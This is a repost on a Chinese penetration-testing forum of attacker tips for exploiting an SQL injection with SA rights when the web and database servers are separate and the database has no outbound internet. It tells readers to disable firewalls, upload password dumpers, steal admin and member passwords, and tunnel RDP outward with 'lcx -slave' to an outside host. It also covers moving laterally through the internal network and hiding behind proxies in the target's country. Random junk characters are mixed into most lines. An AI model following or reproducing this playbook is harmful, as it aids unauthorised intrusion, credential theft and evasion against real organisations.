中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]
作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。; E" L% @! q# f. Q* R

- a* ^! ~4 K. F& V; ]
4 l+ r! T- Z3 p# n4 V
1 P) l8 N6 z& @$ L+ W" I" {. \SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)2 O8 m8 m! n; a

* m9 s  X$ s$ c6 i& O0 v; ?) V
一、DB机有公网IP.
6 C$ a( E1 ^. ^9 r' b- t2 H9 J6 v: L; f. O( i6 |, K) w% ?) B  h
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.  A1 z; _) d4 U& O2 }

/ q' h8 X0 K+ u7 h( \
( o- s. d* l: T; R/ _' ]2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
& D$ q$ w& Q: v; x! D- }% v7 {3 s  \- z$ ?
9 w2 o, n, D3 B  F1 M& ?: o8 t4 f
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
7 j% n, ^7 F% h6 D, B& j
" O7 n) ~  V) @. J; Q# G0 [) ^3 c6 S3 L* o! m0 E
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.& o' g/ ~8 H1 ^  }
4 K0 J' C1 Y; B

6 u+ y# D$ R( [7 V& S
4 T% S% q) X8 h+ {$ Q" F二、DB机只有内网IP
% Z3 i  l% F8 ?
4 L( L7 k9 f9 Y) }9 ^7 J8 w' t- v1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
7 s" f2 y1 [/ Z! l4 c5 e3 e, x  L/ C# y  \: f" A0 G) W

/ k5 C4 I, a, i/ n! \2:停掉防火墙和IP策略再从内往外扫描.
' u( f; @7 ^2 m  q, J4 m: z0 _" P9 H& Z

# l/ M2 G5 R( X2 `6 b& d3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
) l' z9 m) W7 A1 J+ F
+ w6 \) v& X( @- I6 O1 y" e' F. n
8 d- q' J. e& L! Z' Y4:学会密码规律分析往往会有惊喜.8 v/ O  d- s# l& v/ R( D" B: G. Y; [* ]
) H( k: T. O3 w2 U; `+ o7 e
3 R* B' o* ]3 i# a5 M8 g
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
4 s8 D# R; |& D! L& J' D( s4 P# X
0 f9 |0 ]( j1 O  m* K. n3 z! Q' o$ F$ X" g, C, e, j& z
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2